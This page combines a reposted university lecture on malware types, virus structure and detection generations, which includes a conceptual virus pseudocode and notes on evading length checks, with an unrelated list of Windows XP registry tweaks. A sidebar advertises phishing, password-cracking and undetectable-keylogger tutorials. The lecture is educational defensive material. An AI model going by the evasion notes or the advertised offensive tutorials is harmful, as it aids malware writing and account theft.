* Logic bombs are programmed threats that lie dormant for an extended period of time until they are triggered; at this point, they perform a function that is not the intended function of the program in which they are contained. Logic bombs usually are embedded in programs by software developers who have legitimate access to the system.
* Viruses are "programs" that modify other programs on a computer, inserting copies of themselves. A program is a file that adheres to a strict description of how its content is organized. On Linux systems, the ELF document of some 50-pages describes this format. In this sense, viruses are not programs - they cannot run on their own, and need to become part of some host program. When such an infected program is executed, the virus attaches itself to another and so on.
* A worm is a malicious program that copies itself from one computer to another on a network. A worm is an independent program, in the sense described above, unlike a virus which is a part-program that must insert itself into a whole-program. A worm typically does not modify other programs. A typical worm may carry other code, including programs and viruses.
* Trojan horses are programs that appear to have one function but actually perform another function. Trojan horses are named after the Trojan horse of the Greek Trojan War.
* Bacteria, or rabbit programs, make copies of themselves to overwhelm a computer system's resources. Bacteria do not explicitly damage any files. Their sole purpose is to replicate themselves. A typical bacteria program may do nothing more than execute two copies of itself simultaneously on multiprogramming systems, or perhaps create two new files, each of which is a copy of the original source file of the bacteria program. Both of those programs then may copy themselves twice, and so on. Bacteria reproduce exponentially, eventually taking up all the processor capacity, memory, or disk space, denying the user access to those resources.
* A dropper is a program that is not a virus, nor is it infected with a virus, but when run it installs a virus into memory, on to the disk, or into a file. Droppers have been written sometimes as a convenient carrier for a virus, and sometimes as an act of sabotage. Some anti-virus programs try to detect droppers.
* [From http://securityresponse.symantec.com/avcenter/refa.html ] "Blended threats combine the characteristics of viruses, worms, Trojan Horses, and malicious code with server and Internet vulnerabilities to initiate, transmit, and spread an attack. By using multiple methods and techniques, blended threats can rapidly spread and cause widespread damage. Characteristics of blended threats include:

* Causes harm: Launches a Denial of Service (DoS) attack at a target IP address, defaces Web servers, or plants Trojan Horse programs for later execution.
* Propagates by multiple methods: Scans for vulnerabilities to compromise a system, such as embedding code in HTML files on a server, infecting visitors to a compromised Web site, or sending unauthorized email from compromised servers with a worm attachment.
* Attacks from multiple points: Injects malicious code into the .exe files on a system, raises the privilege level of the guest account, creates world read and writeable network shares, makes numerous registry changes, and adds script code into HTML files.
* Spreads without human intervention: Continuously scans the Internet for vulnerable servers to attack.
* Exploits vulnerabilities: Takes advantage of known vulnerabilities, such as buffer overflows, HTTP input validation vulnerabilities, and known default passwords to gain unauthorized administrative access.

Effective protection from blended threats requires a comprehensive security solution that contains multiple layers of defense and response mechanisms."

Virus Varieties
Stealth Virus

A stealth virus has code in it that seeks to conceal itself from discovery or defends itself against attempts to analyze or remove it. The stealth virus adds itself to a file or boot sector but, when you examine, it appears normal and unchanged. The stealth virus performs this trickery by staying in memory after it is executed. From there, it monitors and intercepts your system calls. When the system seeks to open an infected file, the stealth virus displays the uninfected version, thus hiding itself.
Macro Viruses

Macro languages are (often) equal in power to ordinary programming languages such as C. A program written in a macro language is interpreted by the application. Macro languages are conceptually no different from so-called scripting languages. Gnu Emacs uses Lisp, most Microsoft applications use Visual Basic Script as macro languages. The typical use of a macro in applications, such as MS Word, is to extend the features of the application. Some of these macros, known as auto-execute macros, are executed in response to some event, such as opening a file, closing a file, starting an application, and even pressing a certain key. A macro virus is a piece of self-replicating code inserted into an auto-execute macro. Once a macro is running, it copies itself to other documents, delete files, etc. Another type of hazardous macro is one named for an existing command of the application. For example, if a macro named FileSave exists in the "normal.dot" template of MS Word, that macro is executed whenever you choose the Save command on the File menu. Unfortunately, there is often no way to disable such features.

In May 2000, an OutLook mail program macro virus called LOVELETTER propagated widely.
Unix/Linux Viruses

The most famous of the security incidents in the last decade was the Internet Worm incident which began from a Unix system. But Unix systems were considered virus-immune -- not so. Several Linux viruses have been discovered. The Staog virus first appeared in 1996 and was written in assembly language by the VLAD virus writing group, the same group responsible for creating the first Windows 95 virus called Boza.

Like the Boza virus, the Staog virus is a proof-of-concept virus to demonstrate the potential of Linux virus writing without actually causing any real damage. Still, with the Staog assembly language source code floating around the Internet, other virus writers are likely to study and modify the code to create new strains of Linux viruses in the future.

The second known Linux virus is called the Bliss virus. Unlike the Staog virus, the Bliss virus can not only spread in the wild, but also possesses a potentially dangerous payload that could wipe out data.

While neither virus is a serious threat to Linux systems, Linux and other Unix systems will not remain virus-free. Fortunately, Linux virus writing is more difficult than macro virus writing for Windows, so the greatest virus threat still remains with Windows. [July 2000, http://www.boardwatch .com/ mag/ 2000/ jul/ bwm142pg2.html ]
Spreading Malware via the Internet

Whereas a Trojan horse is delivered pre-built, a virus infects. In the past, such malicious programs arrived via tapes and disks, and the spread of a virus around the world took many months. Antivirus companies had time to identify a new viral strain, and create cleaning procedures. Today, Trojan horses, and viruses are network deliverable as E-mail, Java applets, ActiveX controls, JavaScripted pages, CGI-BIN scripts, or as self-extracting packages.

Integrated mail systems such as Microsoft Outlook make it very simple to send not only a quick note edited within a limited text editor but also previously composed computer documents of arbitrary complexity to anyone, and to work with objects that you receive via standards such as MIME. They also support application programming interfaces (such as MAPI) that allow programs to send and process mail automatically. Well over 500 million E-mail messages are delivered daily in July 2000.

Mobile-program systems are becoming more and more widespread. The most widely-hyped examples today are Java and ActiveX. This technology became popular with Web servers and browsers, but it is now integrated (e.g., Java into Lotus Notes, and ActiveX into Outlook) mail systems. Both Java and ActiveX have been found to have security bugs.
Structure of Viruses

Here is a simple structure of a virus. In the infected binary, at a known byte location in the file, a virus inserts a signature byte used to determine if a potential carrier program has been previously infected.

Code:

V() { infectExecutable(); if (triggered()) { doDamage(); } jump to main of infected program; }

void infectExecutable() { file = chose an uninfected executable file; prepend V to file; }

void doDamage() { ... }

int triggered() { return (some test? 1 : 0); }

The above virus makes the infected file longer than it was, making it easy to spot. There are many techniques to leave the file length and even a check sum unchanged and yet infect. For example, many executable files often contain long sequences of zero bytes, which can be replaced by the virus and re-generated. It is also possible to compress the original executable code like the typical Zip programs do, and uncompress before execution and pad with bytes so that the check sum comes out to be what it was.
Virus Detection

Known viruses are by far the most common security problem on modern computer systems. Several web sites maintain complete lists of known viruses. There are thousands. Visit, e.g., http://www.cai.com/ virusinfo/ encyclopedia/. In the month of July 2000, there were 200+ "PC Viruses in the Wild" (www. wildlist. org). Virus detection programs analyze a suspect program for the presence of known viruses.

Fred Cohen has proven mathematically that perfect detection of unknown viruses is impossible: no program can look at other programs and say either "a virus is present" or "no virus is present", and always be correct. But, in the real world, most new viruses are sufficiently like old viruses that the same sort of scanning that finds known viruses also finds the new ones. And there are a large number of heuristic tricks that anti-virus programs use to detect new viruses, based either on how they look, or what they do. These heuristics are only sometimes successful, but since brand-new viruses are comparatively rare, they are sufficient to the purpose.

Virus scanners are sometimes classified by their "generation." The first generation virus scanners used previously obtained a virus signature, a bit pattern, to detect a known virus. They record and check the length of all executables. The second generation scans executables with heuristic rules, looking, e.g., for fragments of code associated with a typical virus. They also do integrity checking by calculating a checksum of a program and storing somewhere else the encrypted checksum. The third generation use a memory resident program to monitor the execution behavior of programs to identify a virus by the types of action that the virus takes. The fourth Generation Virus Detection combines all previous approaches and includes access control capabilities.

It is very educational to study the details of a scanner. The paper by Sandeep Kumar, and Gene Spafford, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference, IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992 [Local copy .pdf] is Required Reading.
Lab Experiment

None.
Acknowledgements

These lecture materials are gleaned from many sources. All are presented after careful reading. In some cases, I may have neglected proper attribution. I assure the reader it is not because I claim authorship. Indeed, in the lectures there is hardly any thing new that I have contributed. Suggestions for improvement are always welcome.
References

1. Vesselin Bontchev, Future Trends in Virus Writing, 1994, IFIP TC-11, http://www.commandcom.com/ virus/ trends.html Recommended Reading.
2. Virus Bulletin is the technical journal on developments in the field of computer viruses and anti-virus products, http://www.virusbtn.com/VirusInformation/ Reference.
3. Simson Garfinkel, Gene Spafford, Practical Unix and Internet Security, 2nd edition (April 1996), O'Reilly & Associates; ISBN: 1565921488. http://www.oreilly.com/catalog/puis/errata/ Chapter 11. Protecting Against Programmed Threats. Required Reading.
4. Sandeep Kumar, and Gene Spafford, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference; IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992. [Local copy .pdf] Required Reading.
5. Steve R. White, Morton Swimmer, Edward J. Pring, William C. Arnold, David M. Chess, John F. Morar, "Anatomy of a Commercial-Grade Immune System," 1999, http://www.research.ibm.com/ antivirus/ SciPapers/ White/Anatomy/anatomy.html The site (www.research.ibm.com/ antivirus/) has many other excellent articles. Recommended Reading.
6. Dark Angel, ?(Phalcon/Skism)Virus Writing Tutorials,? http://www.sirkussystem.com/virus.html Required Reading.
7. Matthew G. Schultz, Eleazar Eskin, Erez Zadok, Manasi Bhattacharyya, and Salvatore J. Stolfo, "MEF: Malicious Email Filter A UNIX Mail Filter that Detects Malicious Windows Executables," Proceedings of the FREENIX Track: 2001 USENIX Annual Technical Conference, June 25-30, 2001, Boston, Masssachusetts, USA; http://www.usenix.org/publications/library/proceedings/ usenix01/ freenix01/ schultz/ schultz_html/ index.html Reference.

10 tips pt windows

1. Not sure of website address and want to try out all possible options ?

Most of the computer users would choose to type less if they are given such an option. Problem is for many of us, to find that option itself is challenging enough! Anyway I am talking to those folks who don't have habit of typing complete domain names and want the computer/Internet to do the job. Here are some of the registry changes that can widen your search domain.. If in Internet options, Display result and go to most likely site or just go to most likely site is enabled, you can type only the domain root in the Address box and Internet Explorer attempts to locate the correct Web site by searching different domain types. For example, if you type "Microsoft" in the Address box, Internet Explorer searches the domain types in the Autoscan list until a domain name match is found (in this case, http://www.microsoft.com).
By default, Internet Explorer searches the following domain types when the Autoscan Common Root Domains option is enabled:.
.com, .org, .net, .edu

To add a domain type to the Autoscan search list, add the string value "" with a value of "%s." and a string value "" with a value of "www.%s." (without quotation marks), where is the next available number and is the domain type, under the following registry key: HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/Main/Url Template For example, if you want to add the .gov domain type and there are already 7 domain types listed, add a string value "8" with a value of "%s.gov" and a string value "9" with a value of http://www.%s.gov. NOTE: The order in which Internet Explorer searches domains is based on the string value.For example, the domain type associated with string value 1 is searched before the domain type associated with string value 2.

2. Attention LAPTOP Users ! Do your eyes a favor, use Clear Type Fonts.
Hi everyone! May be you have already realized the importance of clear type font by now. A new feature that must be a boon to all those people who are spending their life staring these monitor screens!. After years of research, it has been noticed that Clear Type Fonts are best way to prolong you Laptop computer experience. Windows XP comes equipped with it and you can change the setting to use Clear Type fonts. What is not so simple to do is to even change the Welcome (logon) screen to used Clear Type. I have got hand of a tip that might be of help to you installing clear type fonts at logon screen. Save following to a .reg file and import it in registry.
[HKEY_CURRENT_USERControl PanelDesktop]
"FontSmoothing"="2"
"FontSmoothingType"=dword:00000002

[HKEY_USERS.DEFAULTControl PanelDesktop]
"FontSmoothing"="2"
"FontSmoothingType"=dword:00000002
For those of you who do not know how to use clear type fonts in normal session here are the instructions: Right click on at any free area of the desktop and go to appearance tab of Display Properties. Click on effects and check the box saying "use following methods to smooth edges of screen fonts" and select clear type.

3. Fine tune Internet connection speed: Tip on changing QoS parameter.

This tweak deals with QoS parameter manipulation. There have been some confusion as to what can be achieved in real terms by changing the QoS parameter. Microsoft has finally released an article correcting describing the behavior of QoS parameter.

I am providing a link to Microsoft web site knowledgebase article In brief though, this tweak would only work on QoS aware programs and rest of the programs would simply ignore them. Networking Quality of Service (QoS) refers to a variety of techniques that prioritize one type of traffic or program when these operate across a network connection rather than relying solely on "best effort" connectivity. Please click on how to change QoS parameter article using Group Policy Editor (GPEDIT.MSC).By default, programs can reserve up to an aggregate bandwidth of 20 percent of the underlying link speed on each interface on an end computer.

If the program that reserved the bandwidth is not sending enough data to utilize it completely, the unused portion of the reserved bandwidth is available for other data flows on the same host. This default parameter can be changed.

4. Further fine tune Internet access speed: Tip on improving DNS resolution.

Internet browsing is such an exciting and easy experience now a days that we have almost forgotten the amount of work that goes behind the scene to make this all happen. We only feel bad if we can't find something easily or have to wait for a long time (I have heard many people saying WWW stands for world wide wait not too long ago!!!) Well with changes in technology and falling prices we have far better hardware and software to do this job but fruits of fine tuning have always been great and would continue to remain so. One of the things that should happen before Internet connection would go through is DNS resolution.DNS stands for Domain Name Service. Even though XP does a fine job of handling DNS resolution, you may still gain by increase the DNS Cache size. To do this you would have to add following entries in registry. Save what is written below in say "dnstuning.reg" file and import it in REGISTRY but opening registry editor and going to IMPORT option from top menu.
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesD nscacheParameters]
"CacheHashTableBucketSize"=dword:00000001
"CacheHashTableSize"=dword:00000180
"MaxCacheEntryTtlLimit"=dword:0000fa00
"MaxSOACacheEntryTtlLimit"=dword:0000012d

5. Want to remove shared documents folder from My Computer window ?

Microsoft has done a fabulous job in the making of Windows XP. But least to say, no two people are alike. Some of the default features that Microsoft thought was good may not be liked by you at all. I have read various newsgroups and chats and one thing I noticed is that some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit. Once in registry, navigate to key HKEY_LOCAL_MACHINE SOFTWARE Microsoft Windows CurrentVersion Explorer My Computer NameSpace DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.

6. Want to have more options in the Add/Remove program list ?
All programs that are available on your Windows XP system are not available for removal. For example wordpad. I mean you don't want to remove wordpad from Add/Remove program list, but that serves just as an example. So why are some programs in the list and some not. Its not a game of Random numbers. There many a few unique methods through which we can control what appears on list and what does not. If you have installed Windows in C: drive , Go to C:WINDOWSinf (substituting the correct drive letter for your version of Windows) and open the sysoc.inf file. File contents looks like this: See the components that have word HIDE as second last item on the row. This hide tells system to not to display those items/apps in the Add/Remove program list. If you want to have this item in list, simply replace it with blank. I think you understand what am I saying
[Version]
Signature = "$Windows NT$"
DriverVer=07/01/2001,5.1.2600.0
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp4 0ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
Games=ocgen.dll,OcEntry,games.inf,,7
AccessUtil=ocgen.dll,OcEntry,accessor.inf,,7
CommApps=ocgen.dll,OcEntry,communic.inf,HIDE,7
MultiM=ocgen.dll,OcEntry,multimed.inf,HIDE,7
AccessOpt=ocgen.dll,OcEntry,optional.inf,HIDE,7
Pinball=ocgen.dll,OcEntry,pinball.inf,HIDE,7
MSWordPad=ocgen.dll,OcEntry,wordpad.inf,HIDE,7
ZoneGames=zoneoc.dll,ZoneSetupProc,igames.inf,,7
[Global]
WindowTitle=%WindowTitle%
WindowTitle.StandAlone="*"

7. How to verify XP software you bought is OEM/UPGRADE/RETAIL?

I am sure we all have noticed Microsoft product marketing strategy. Whenever they launch any new product line,there are various flavors of it available right from day one. Some are given adjectives like UPGRADE version or FULL, others RETAIL v/s OEM and then of-course we have various categories of the product like HOME, PRO , SERVER , ADVANCED SERVER etc etc. Well ever wondered what you bought is same as what was advertised ? How to tell the difference. Here comes the help. Look for a file called Setupp.ini that is present on your Windows XP CD and double click on it and browse its content. There is a field called PID=. This PID is what would tell us exactly what we have got.First 5 bytes of PID decide whether (it is OEM or RETAIL or is an UPGRADE ) and last three digits determine what kind of CD KEY will it accept. Here are some of the typical PID values:
Retail = 51882 335
Volume License = 51883 270
OEM = 82503 OEM

8. Group Policy Editor: Extremely powerful tool in Microsoft XP Operating System.

Have you heard of group policy editor ? This is one of the most powerful tool that Microsoft XP comes bundled with that most of us don't even know about. I recently discovered it by accident. Learn more about it at Group Policy Editor section of this site but in brief it can be used to carry out powerful customizations and performance tuning of your system. Go to START-RUN and enter gpedit.msc

9. Have tendency to forget passwords ? Want a solution that will help you get back in business ?

Most of us have a common tendency of forgetting passwords. If you don't every forget anything, I envy you and this may not be of much use to you but for most of us, this may be a life saver. If you're running Windows XP Professional as a local user in a workgroup environment, you can create a password reset disk by following instruction as shown below:
Go to START-CONTROL PANEL-USER ACCOUNTS. Then click your account name and further on in RELATED TASKS, click PREVENT A FORGOT PASSOWRD. A wizard would come up, follow instructions and you have your password reset disk ready.
IMPORTANT NOTE: As it goes with things like password, make sure that you keep this disk at secure location else you risk tress passing with your user account.

10. Want to change font size of Internet Explorer content on the fly ?

Do you know that font size of many of the web sites can be changed as per your view pleasure. Yea ! You know about it but do not want to take those additional steps. I hear you !
Here is a tip. If you have a mouse that has scrolling button then fond changing is as easy as pressing CTRL key and rotating scrolling button either towards you (to increase) or away from you (to decrease).
Try it out. It works for me.

Pagini

Instalare Linux

Tutorial Hack Masina De Cafea

Cum sa repari un CD zgariat

Securizare server web

Yahoo Tricks

10 setari pentru un Windows mai 'ascultator'

CUM sa faci bani pe net!

Ascunde Fisiere in un .jpg

Cum cream un backup (imagine a hdd-ului) cu Acronis

[Tutorial] SQL Injection

Reindexarea unui domeniu

Premium Acount List [Updated]

vrei sa fii creatorul windowsului?

AntiFlood Ip, Cs serve ,Php

Cum sa facem o pagina de phishing la orice site.

VPN gratuit

Cum sa spargi un root/http(basic autentification)/php

Cum sa faci un virus / trojan / keylogger indetectabil 100%

mIRC Spammer

SQL Injection Attacks Tutorial

LINUX Security Basic

Unix Remote Attacks

What is DOS

IP Shower via PHP

Viruses, Worms and Trojans

Windows Tips

Etichete

Site-Link